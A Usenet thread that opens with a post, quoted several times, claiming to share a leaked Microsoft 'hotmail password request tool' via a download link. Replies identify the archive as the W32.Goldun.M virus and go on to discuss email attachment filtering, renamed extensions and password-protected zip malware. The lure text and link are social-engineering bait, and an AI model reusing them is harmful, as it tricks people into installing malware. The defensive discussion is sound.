hotmail password request tool (intranet usage)

[updateserver28]

I found this on our intranet (i work at microsoft), and as im not
working there anymore soon i thought it would be nice for all you guys
and girls to get your hands on it. Ive put it on
http://matweb.info/~hotmail/hotmail.rar

Have fun!

 

[Matthias Hoys]

I found this on our intranet (i work at microsoft), and as im not
working there anymore soon i thought it would be nice for all you guys
and girls to get your hands on it. Ive put it on
http://matweb.info/~hotmail/hotmail.rar

Have fun!

Is it a virus or a Trojan Horse ? What does it do exactly ?

 

[bernard tatin]

Is it a virus or a Trojan Horse ? What does it do exactly ?

My eMac cannot run it, so I cannot tell you.

I open it with Emacs and it contains this :

<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<assembly xmlns="urn:schemas-microsoft-com:asm.v1"manifestVersion="1.0">
<assemblyIdentity
type="win32"
processorArchitecture="*"
version="6.0.0.0"
name="mash"
/>

<description>AutoIt 3</description>
<dependency>
<dependentAssembly>
<assemblyIdentity
type="win32"
name="Microsoft.Windows.Common-Controls"
version="6.0.0.0"
language="*"
processorArchitecture="*"
publicKeyToken="6595b64144ccf1df"
/>
</dependentAssembly>
</dependency>
</assembly>

I like the text - i work at microsoft ...

Bernard

 

[Ulrich Hobelmann]

Let me see if I get this correctly ... you have stolen an internal
file from Microsoft and you are distributing it in a usenet group.
And you think anyone out here dumb enough to blindly open an archive
file not knowing its contents.

What's wrong with unpacking an archive file? I do that every time
with software distributions. Most of the time they contain a
README file, but even if they didn't, you are free to look through
files, no?

If it says that the archive is *not* for everyone to read (like
"this is MS property"), then maybe that's a sign you should stop.

 

[Brice DEKANY]

I found this on our intranet (i work at microsoft), and as im not
working there anymore soon i thought it would be nice for all you guys
and girls to get your hands on it. Ive put it on
http://matweb.info/~hotmail/hotmail.rar

Have fun!

People really believe this ???

 

[Ulrich Hobelmann]

Here at the University of Washington there have been demonstrations of
archive files that autoexecute when opened (not even unpacked) which is
more than enough to trigger an attack.

What's "opening" an archive file and how does it execute
something?? An archive is a container format, and as such,
passive data. Your can look at the contents, or extract the files
within. If your look-at-archive program executes random stuff,
it's horribly broken.

How serious is the problem? All .zip files are deleted by our mail
server. I'll let you be the judge, knowing that, of how you feel about
opening and archive that is self-identified as stolen from an internal
web site (what does that say about the poster's integrity level) and
for which the poster has done his or her best to not reveal what is
actually contained.

WHAT? I'd get quite furious if someone just deleted all zips in
my email! Why not just delete all emails, then you can't get spam
anymore!

Microsoft is now involved. If this person is truly inside the company
they may well exit sooner than they planned ... and not through the
front door. I've as much use for thieves as for spammers.

I believe it's a virus inside, and no secret MS stuff. So even if
there is, how can I be guilty for just *looking* inside? Isn't
that the same as finding top-secret documents on the street and
looking at them? I didn't sign no NDA. Of course if it's MS
code, then distributing it would be illegal.

 

[axel]

Don't know ... don't care. I handed it off, with full headers, to the
proper authorities and they were not amused.

With the spammer... or with you for wasting their time?

If you do this with every piece of spam you come across it indicates
that you have a lot of free time on your hands.

By the way, for your information, the OP, although spamming, for
which he should be quite rightly be condemned, was not distributing
a file in a usenet group... just its location.

Axel

 

[mmcconnell17704]

How serious is the problem? All .zip files are deleted by

WHAT?

This is happening to several of my friends, especially in academia.

 

[Frank van Bortel]

This is happening to several of my friends, especially in academia.

You would think people *knew*, or at least, investigate, in
those circles <g>

 

[Charles Newman]

Let me see if I get this correctly ... you have stolen an internal
file from Microsoft and you are distributing it in a usenet group.
And you think anyone out here dumb enough to blindly open an archive
file not knowing its contents.

I have forwarded your posting to the Redmond Washington Police
Department. And hope they find you quickly.

I dont think the Remond Police Dept will be able
to do much, as the posting is showing an address
in Holland, in the headers. 62.195.137.150
points to a computer at chello.nl, in Holland.
You should forward that post to the authorities
in Holland, if you want to do something, as
US courts have no jurisdiction in Holland.

 

[Todger]

Charles Newman wrote

I dont think the Remond Police Dept will be able
to do much, as the posting is showing an address
in Holland, in the headers. 62.195.137.150
points to a computer at chello.nl, in Holland.
You should forward that post to the authorities
in Holland, if you want to do something, as
US courts have no jurisdiction in Holland.

The Dutch won't give a shit.

 

[Charles Newman]

It's very common, and a good method, to delete Zip files that are
passworded or can't be opened and the contents scanned for malicious code
by the email av or firewall software. We always delete unscannable zip
file.

What is someone changed the file extension to
something like ZPP? That would get it past the
filters that delete ZIP files.

 

[Ilgaz]

What's wrong with unpacking an archive file? I do that every time with
software distributions. Most of the time they contain a README file,
but even if they didn't, you are free to look through files, no?

If it says that the archive is *not* for everyone to read (like "this
is MS property"), then maybe that's a sign you should stop.

Its probably a virus or malware etc doing bad things but the CPU and OS
is different.

This thing we see maybe first propagation of a new usenet/mail worm and
I bet the poster has no clue what 'usenet is", machine zombied.

Come on, nobody can be _that_ stupid lol.

Note to virus author: Your virus works but sends messages to a MAC
newsgroup!

Ilgaz Ocal

 

[Ilgaz]

I found this on our intranet (i work at microsoft), and as im not
working there anymore soon i thought it would be nice for all you guys
and girls to get your hands on it. Ive put it on
http://matweb.info/~hotmail/hotmail.rar

Have fun!

W32.Goldun.M virus, Intego virus barrier reports.

I saved a lots of people from checking the file I bet

Yay, so I have a anti virus in fact

Ilgaz

 

[Ilgaz]

W32.Goldun.M virus, Intego virus barrier reports.

I saved a lots of people from checking the file I bet

Yay, so I have a anti virus in fact

Ilgaz

And posted via groups.google.com , definitely reporting to google. Very
interesting! Google got no NNTP access yes?

Ilgaz

 

[Terry Dykstra]

Not necesarily. Decent content scanners determine what the file is not
based on the extension, but the signature. Same for files included within a
zip.

--
Terry Dykstra
Canadian Forest Oil Ltd.

It's very common, and a good method, to delete Zip files that are
passworded or can't be opened and the contents scanned for malicious code
by the email av or firewall software. We always delete unscannable zip
file.

What is someone changed the file extension to
something like ZPP? That would get it past the
filters that delete ZIP files.

 

[MyndPhlyp]

On 2005-04-18 21:00:30 +0300, Ulrich Hobelmann <[email protected]> said:

Come on, nobody can be _that_ stupid lol.

Genius has its limitations. Stupidity knows no boundaries.

 

[Karl A. Krueger]

[ Followups redirected to somewhere this is on topic. ]

What is someone changed the file extension to something like ZPP? That
would get it past the filters that delete ZIP files.

We do not delete ZIP attachments (or -ever- alter message bodies) but it
is relatively trivial to detect the real file type of an attachment,
even if it is maliciously renamed to conceal it.

Email attachments are encoded using Base-64, which is deterministic --
so the "magic numbers" at the beginning of a binary data file will
always come out to a given pattern of Base-64 encoding. Thus, a simple
regular-expression matcher (as is built in to the Postfix MTA and many
others) will suffice to detect and reject messages with attachments of a
given type, even renamed.

It was in response to anti-virus software that can scan into ZIP files
that some email viruses started sending themselves as passworded files.
They'd include the password in the message body and instruct the user to
open the attachment using it. Nobody should be surprised that this
worked -- indeed, telling the user that the attached document is so
important that it had to be passworded is a good bit of social
engineering.


I personally consider it bad practice for a mail server to alter the
contents of a message, as by deleting an attachment. Doing so creates
the (correct!) impression that "the computer people are fooling with my
email" and damages users' trust. It also fails to inform the *sender*
that the message was not transmitted successfully -- and the SMTP
language has no way to express 'partial delivery'.

What's more, it's not terribly effective at reducing the fuss and bother
associated with viruses. Email viruses do not attach themselves to
'real' messages -- they send messages of their own, which serve no
purpose but to pass the virus. Stripping the attachment off such a
message and delivering it tells the user, "I know this message was junk
meant to harm you. I killed it. Here, have its corpse!" Except to the
sort of user who *likes* it when the cat delivers dead birds and mice,
this is silly behavior. Users have enough clutter in their mailboxes
without the corpses of viruses added to the mix.

When a message comes in that the security rules say must not be
delivered, the sensible thing for the mail server to do is to simply
reject it. SMTP rejection means the recipient's mail server doesn't
even accept the message for delivery -- it says "no, thank you" and
leaves it up to the sender's mail server to report the failure. In the
case of a virus, the sender usually just goes away and harasses someone
else. In the case of real mail erroneously intercepted, the rejection
can come with an informative error message ("Sorry, we don't allow ZIP
files in email. Please use a file transfer protocol when you want to
transfer files!") that the sender will then receive and can handle
appropriately.

 

[André Thieme]

It's very common, and a good method, to delete Zip files that are
passworded or can't be opened and the contents scanned for malicious code
by the email av or firewall software. We always delete unscannable zip
file.

Why not put a passworded zip into a scannable zip?


André
--

 

[peter pilsl]

What is someone changed the file extension to
something like ZPP? That would get it past the
filters that delete ZIP files.

Then the usual user will not be able to open the zipfile when it has a
zpp-extension and not be able to click the file inside "naked_woman.exe"
which actually is a virus.

Deleting executable attachemnts and unscannable zips from the mail is
done in most of the companies I sysadmin. Some Users still click on
everything that has a icon and a promising name. MS-click-me-advertising
has done some braindamager to the weaker minded.

best,
peter